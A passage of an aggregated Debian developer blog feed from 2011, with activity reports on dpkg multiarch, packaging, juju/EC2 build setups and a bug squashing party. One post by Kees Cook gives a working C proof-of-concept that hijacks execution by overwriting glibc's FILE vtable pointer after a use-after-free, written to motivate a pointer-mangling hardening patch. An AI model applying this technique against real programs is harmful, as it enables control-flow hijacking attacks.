    After discussing the issue with Colin Watson and Joey Hess during debconf, I came to the conclusion that it was not really desirable at this point. The objections were that debian-installer was not ready for it and that it adds a new dependency on xz for debootstrap to work on non-Debian systems. I believe that the debian-installer side is no longer a problem since unxz is built into busybox-udeb (since version 1:1.19.3-2). For the other side, there's not much to do except ensuring that xz is portable to all the other OSes we care about. DAK has been updated too (see #556407).
  4. Be more reactive to review/merge dpkg patches: PARTLY DONE
    I don't think we had any patch that received zero input. We still have a backlog of patches, and the situation is far from ideal, but it has improved.
  5. Implement the rolling distribution proposed as part of the CUT project and try to improve the release process: NOT DONE
    We had a BoF during debconf, and we discussed it at length on debian-devel, but in the end nothing came out of it, except that Josselin Mouette wrote a proof of concept for his idea. For me, testing is already what people are expecting from a rolling distribution. It's just a matter of documenting how to effectively use testing, and of some marketing by defining rolling as an alias to testing.
  6. Work more regularly on the developers-reference: PARTLY DONE
    I did contribute some new material to the document but not as much as I could have hoped. On the other hand, I have been rather reactive to ensure that sane patches got merged. We need more people writing new parts and updating the existing content.
  7. Write a 10-lesson course called Smart Package Management : NOT DONE
  8. Create an information product (most likely an ebook or an online training) and sell it on my blog: NOT DONE
    This was supposed to happen after the translation of the Debian Administrator's Handbook. Since the translation is not yet over, I did not start to work on this yet.
  9. By the end of the year, have at least 1/3 of my time funded by donations and/or earnings of my information products: NOT REACHED
    My target was rather aggressive at 700€ each month, and given that I did not manage to complete any information product, I'm already very pleased to have achieved a mean of 204€ in donations each month (min: 91€, max: 364€). It's more than two times better than in 2010. Thank you! Note that those figures do not take into account the revenues of the fundraising for the Debian Administrator's Handbook, since they will be used for its translation.
That makes quite a lot of red (for things that I did not achieve); on the other hand, I completed projects that I did not foresee and did not plan. For instance, improving dpkg-buildflags and then merging Kees Cook's work on hardened build flags was an important step for Debian. This had been waiting for so long already...


3 January 2012

Rapha&#235;l Hertzog: My Debian Activities in December 2011

This is my monthly summary of my Debian related activities. If you're among the people who made a donation to support my work (364.18€, thanks everybody!), then you can learn how I spent your money. Otherwise it's just an interesting status update on my various projects.

Dpkg and Multiarch

I had some hope to have a multiarch-enabled dpkg in sid for Christmas, as Guillem told me that it was realistic. Alas, Guillem got sick. We're in January and we're still not there. While some of Guillem's commits in December were related to multi-arch, the size of his pu/multiarch/master branch did not really shrink. We still have 36 commits to merge; most of the work he did was refactoring some parts of the code that were already merged. And he initiated some discussion on interface changes. I participated in those discussions hoping to bring them to a quick resolution. I'm still maintaining my own pu/multiarch/full branch; it is based on Guillem's branch but with further fixes that I developed and that he has not yet merged, and with a change reverted (Guillem's branch allows crossgrading packages between different architectures while dpkg does not manage this correctly yet). I can only hope that January will be the last month of this never-ending saga. It's been one year since I started working on this project. :-(

Misc dpkg work

I reviewed (and later merged) a patch of Kees Cook to enhance dpkg-buildflags so that it can report which hardening features are enabled. This feature might then be used by tools like lintian to detect missing hardening features. I mentored Gianluca Ciccarelli, who is trying to enhance dpkg-maintscript-helper to take care of replacing a directory by a symlink and vice-versa. I took care of #651993 so that dpkg-mergechangelogs doesn't fail when it encounters an invalid version in the changelog, and of #652414 so that dpkg-source --commit accepts a relative filename when a patch file is explicitly given. Guillem also merged a fix I developed for LP#369898.

Packaging work

WordPress 3.3 came out so I immediately packaged it. Despite my upstream bug report, they did not update their GPL compliance page which offers the corresponding sources for what's bundled in the tarball. So I hunted for the required sources myself, and bundled them in the debian.tar.xz of the Debian source package. It's a rather crude solution, but this allowed me to close the release critical bug #646729 and to reintroduce the Flash files that were dropped in the past, which is great since the Flash-based file uploader is nicer than the one using the browser's file field.

Quilt 0.50 came out after 2 years of (slow) development. The Debian package has many patches and several of them had to be updated to cope with the new upstream release. Fortunately some of them were also merged upstream. It still took an entire morning to complete this update. I also converted the packaging from CDBS to dh with a short rules file.

Zim 0.54 came out and I immediately updated the package since it fixed a bug that was annoying me.

Review of the ledgersmb packaging

As the sql-ledger maintainer (and a user of this software for my accounting), I have been hoping to get ledgersmb packaged as a possible replacement for it. I have been following the various efforts initiated over time, but none of them resulted in a real package in Debian. This is a real pity, so I tried to fix this by offering to sponsor package uploads. That's why I did a first review of the packaging.
It took several hours because you have to explain everything that's not good enough. I also filed a wishlist bug against lintian (#652963) to suggest that lintian should detect improper usage of dpkg-statoverride (this is a mistake that was present in the package that I reviewed).

nautilus-dropbox work

I wanted to polish the package in time for the Ubuntu LTS release, and since Debian Import Freeze is in January, I implemented some of the important fixes that I wanted. The Debian package diverges from upstream in that the non-free binaries are installed in /var/lib/dropbox/ instead of $HOME. Due to a bug, the files were not properly root-owned, so I first fixed this (unpacking the tarball as root led to reuse of the embedded user & group information, and that information changed recently on the Dropbox side, apparently). Then we recently identified other problems related to proxy handling (see #651065). I fixed this too, because it's relatively frequent that the initial download triggered during the package configuration fails, and in that case it's the user that will re-trigger a package download after having given the appropriate credentials through PackageKit. Without my fix, usage of pkexec would imply the loss of the http_proxy environment variable, and thus it would not be possible for a user to download through a proxy. Last but not least, I reorganized the Debian specific patches to better separate what can and should be merged upstream from the changes that upstream doesn't want. Unfortunately Dropbox insists on being able to auto-update their non-free binaries; they are, thus, against the installation under /var/lib/dropbox and the corresponding changes.

Book update

We're making decent progress in the translation of the Debian Administrator's Handbook; about 6 chapters are already translated (not yet reviewed though). The liberation campaign is also (slowly) going forward. We're at 67% now (thanks to 90 new supporters!) while we were only at 60% at the start of December.

Thanks

See you next month for a new summary of my activities.


23 December 2011

Kees Cook: abusing the FILE structure

When attacking a process, one interesting target on the heap is the FILE structure used with the stream functions (fopen(), fread(), fclose(), etc.) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, and so on. What's interesting is that this isn't actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE.

[Diagram: glibc FILE vtable location on the heap]

In the face of use-after-free, heap overflow, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target and, much like the pointers found in setjmp()/longjmp(), atexit(), etc., could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn't protected the FILE structure in the same way. I'm hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven't overlooked something, since I'd really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :) Here's a quick exploit demonstration in a trivial use-after-free scenario:
#include <stdio.h>
#include <stdlib.h>
void pwn(void)
{
    printf("Dave, my mind is going.\n");
    fflush(stdout);
}
void * funcs[] = {
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
};
int main(int argc, char * argv[])
{
    FILE *fp;
    unsigned char *str;
    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));
    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);
    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r"))) {
        perror("fopen");
        return 1;
    }
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Trigger call to pwn(). */
    fclose(fp);
    return 0;
}
Before the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.
After the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault
Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to determine where various structures will end up in the heap relative to each other. I'd like to see this fixed too, but it'll require more time to study. :)

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

7 December 2011

Kees Cook: how to throw an EC2 party

Prepare a location to run juju and install it:
mkdir ~/party
cd ~/party
sudo apt-get install juju
Initialize your juju environment. Be sure to add "juju-origin: ppa" to your environment, along with filling in your access-key and secret-key from your Amazon AWS account. Note that control-bucket and admin-secret should not be used by any other environment, or juju won't be able to distinguish them. Other variables are good to set now too. I wanted my instances close to me, so I set "region: us-west-1". I also wanted a 64bit system, so using the AMI list, I chose "default-series: oneiric", "default-instance-type: m1.large", and "default-image-id: ami-7b772b3e".
juju
$EDITOR ~/.juju/environments.yaml
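Pulled together, the relevant stanza of environments.yaml looks something like this sketch (the keys are the ones named above; the environment name and the secret values are placeholders):
environments:
  party:
    type: ec2
    juju-origin: ppa
    access-key: YOUR-AWS-ACCESS-KEY
    secret-key: YOUR-AWS-SECRET-KEY
    control-bucket: some-unique-s3-bucket-name
    admin-secret: some-unique-admin-secret
    region: us-west-1
    default-series: oneiric
    default-instance-type: m1.large
    default-image-id: ami-7b772b3e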
Get my sbuild charm, and configure some types of builders. The salt should be something used only for this party; it is used to generate the random passwords for the builder accounts. The distro and releases can be set to whatever the mk-sbuild tool understands.
bzr co lp:~kees/charm/oneiric/sbuild/trunk sbuild-charm
cat >local.yaml <<EOM
builder-debian:
    salt: some-secret-phrase-for-this-party
    distro: debian
    releases: unstable
builder-ubuntu:
    salt: some-secret-phrase-for-this-party
    distro: ubuntu
    releases: precise,oneiric
EOM
Bootstrap juju and wait for ec2 instance to come up.
juju bootstrap
Before running the status, you can either accept the SSH key blindly, or use ec2-describe-instances to find the instance and public host name, and use my wait-for-ssh tool to inject the SSH host key into your ~/.ssh/known_hosts file. This requires having set up the environment variables needed by ec2-describe-instances, though.
ec2-describe-instances --region REGION
./sbuild-charm/wait-for-ssh INSTANCE HOST REGION
Get status:
juju status
Deploy a builder:
juju deploy --config local.yaml --repository $PWD local:sbuild-charm builder-debian
Deploy more of the same type:
juju add-unit builder-debian
juju add-unit builder-debian
juju add-unit builder-debian
Now you have to wait for them to finish installing, which will take a while. Once they're at least partially up (the builder user has been created), you can print out the slips of paper to hand out to your party attendees:
./sbuild-charm/slips | mpage -1 > /tmp/slips.ps
ps2pdf /tmp/slips.ps /tmp/slips.pdf
They look like this:
Unit: builder-debian/3
Host: ec2-256-1-1-1.us-west-1.compute.amazonaws.com
SSH key fingerprints:
  1024 3e:f7:66:53:a9:e8:96:c7:27:36:71:ce:2a:cf:65:31 (DSA)
  256 53:a9:e8:96:c7:20:6f:8f:4a:de:b2:a3:b7:6b:34:f7 (ECDSA)
  2048 3b:29:99:20:6f:8f:4a:de:b2:a3:b7:6b:34:bc:7a:e3 (RSA)
Username: builder
Password: 68b329da9893
To admin the machines, you can use juju itself, where N is the machine number from the juju status output:
juju ssh N
To add additional chroots to the entire builder service, add them to the config:
juju set builder-debian releases=unstable,testing,stable
juju set builder-ubuntu releases=precise,oneiric,lucid,natty
Be warned that this charm does some terrible security hacks internally. Enjoy!

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

Kees Cook: juju bug fixing

My earlier post on juju described a number of weird glitches I ran into. I got invited by hazmat on IRC (freenode #juju) to try to reproduce the problems so we could isolate the trouble.

Fix #1: use the version from the PPA. The juju setup documentation doesn't mention this, but it seems that adding "juju-origin: ppa" to your ~/.juju/environments.yaml is a good idea. I suggest it be made the default, and that the documentation link to the full list of legal syntax for the environments.yaml file. I was not able to reproduce the missing-machines-at-startup problem after doing this, but perhaps it's a hard race to lose.

Fix #2: don't use "terminate-machine". :P There seems to be a problem with doing the following series of commands: juju remove-unit FOO/N; juju terminate-machine X; juju add-unit FOO. This makes the provisioner go crazy, and leaves all further attempts to add units stuck in "pending" forever.

Big thank you to hazmat and SpamapS for helping debug this.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

6 December 2011

Steve Langasek: Making jam from bugs

This weekend, we held a combined Debian Bug Squashing Party and Ubuntu Local Jam in Portland, OR. A big thank you to PuppetLabs for hosting! Thanks to a brilliant insight from Kees Cook, we were able to give everyone access to their own pre-configured build environment as soon as they walked in the door by deploying schroot/sbuild instances in "the cloud" (in this case, Amazon EC2). Small blips with the mirrors notwithstanding, this worked out pretty well, and let people start to get their hands dirty as soon as they walked in the door instead of spending a lot of time up front doing the boring work of setting up a build environment. This was a big win for people who had never done a package build before, and I highly recommend it for future BSPs. You can read about the build environment setup in the Debian wiki, and details on setting up your own BSP cloud in Kees's blog. (And the cloud instances were running Ubuntu 11.10 guests, with Debian unstable chroots - a perfect pairing for our joint Debian/Ubuntu event!) So how did this curious foray into a combined Ubuntu/Debian event go? Not too shabby: When all was said and done, we didn't get a chance to tackle any wheezy release critical bugs like we'd hoped. That's ok, that leaves us something to do for our next event, which will be bigger and even better than this one. Maybe even big enough to rival one of those crazy, all-weekend BSPs that they have in Germany...

Kees Cook: EC2 instances in support of a BSP

On Sunday, I brought up EC2 instances to support the combined Debian Bug Squashing Party/Ubuntu Local Jam that took place at PuppetLabs in Portland, OR, USA. The intent was to provide each participant with their own sbuild environment on a 64bit machine, since we were going to be working on Multi-Arch support, and having both 64bit and 32bit chroots would be helpful. The host was an Ubuntu 11.10 (Oneiric) instance so it would be possible to do SRU verifications in the cloud too.

I was curious about the juju provisioning system, since it has an interesting plugin system, called "charms", that can be used to build out services. I decided to write an sbuild charm, which was pretty straightforward and quite powerful (using this charm it would be possible to trigger the creation of new schroots across all instances at any time, etc.). The juju service itself works really well when it works correctly. When something goes wrong, unfortunately, it becomes nearly impossible to debug or fix. Repeatedly while working on charm development, the provisioning system would lose its mind, and I'd have to destroy the entire environment and re-bootstrap to get things running again. I had hoped this wouldn't be the case while I was using it during production on Sunday, but the provisioner broke spectacularly on Sunday too. Due to the fragility of the juju agents, it wasn't possible to restart the provisioner: it lost its mind, the other agents couldn't talk to it any more, etc. I would expect the master services on a cloud instance manager to be extremely robust, since having them die means totally losing control of all your instances.

On Sunday morning, I started 8 instances. 6 came up perfectly and were excellent work-horses all day at the BSP. 2 never came up. The EC2 instances started, but the service provisioner never noticed them. Adding new units didn't work (instances would start, but no services would notice them), and when I tried to remove the seemingly broken machines, the instance provisioner completely went crazy and started dumping Python traces into the logs (which seems to be related to this bug, though some kind of race condition seems to have confused it much earlier than this total failure), and that was it. We used the instances we had, and I spent 3 hours trying to fix the provisioner, eventually giving up on it.

I was very pleased with EC2 and Ubuntu Server itself on the instances. The schroots worked, sbuild worked (though I identified some additional things that the charm should likely do for setup). I think juju has a lot of potential, but I'm surprised at how fragile it is. It didn't help that Amazon had rebooted the entire West Coast the day before and there were dead Ubuntu Archive Mirrors in the DNS rotation.

For anyone else wanting to spin up builders in the cloud using juju, I have a run-down of what this looks like from the admin's perspective, and even include a little script to produce little slips of paper to hand out to attendees with an instance's hostname, SSH keys, and builder SSH password. It seemed to work pretty well overall; I just wish I could have spun up a few more. :) So, even with the fighting with juju and a few extra instances that came up and had to be shut down again without actually being used, the total cost to run the instances for the whole BSP was about US$40, and including the charm development time, about US$45. UPDATE: some more details on how to avoid the glitches I hit.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

5 December 2011

Kees Cook: PGP key photo viewing

Handy command line arguments for gpg:
gpg --list-options show-photos --fingerprint 0xdc6dc026
This is nice for examining someone's PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings). If gpg doesn't pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
